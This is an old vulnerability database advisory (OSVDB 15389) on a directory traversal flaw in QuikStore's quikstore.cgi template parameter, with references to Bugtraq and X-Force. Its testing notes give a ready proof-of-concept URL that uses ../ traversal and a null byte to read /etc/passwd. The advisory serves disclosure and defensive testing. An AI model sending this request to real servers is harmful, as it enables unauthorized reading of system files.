QuikStore quikstore.cgi template Parameter Traversal Arbitrary File Access

2003-12-23T19:36:31
ID OSVDB:15389
Type osvdb
Reporter OSVDB
Modified 2003-12-23T19:36:31

Description

Manual Testing Notes

http://[victim]/cgi-bin/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-12/0314.html ISS X-Force ID: 14070 Bugtraq ID: 9283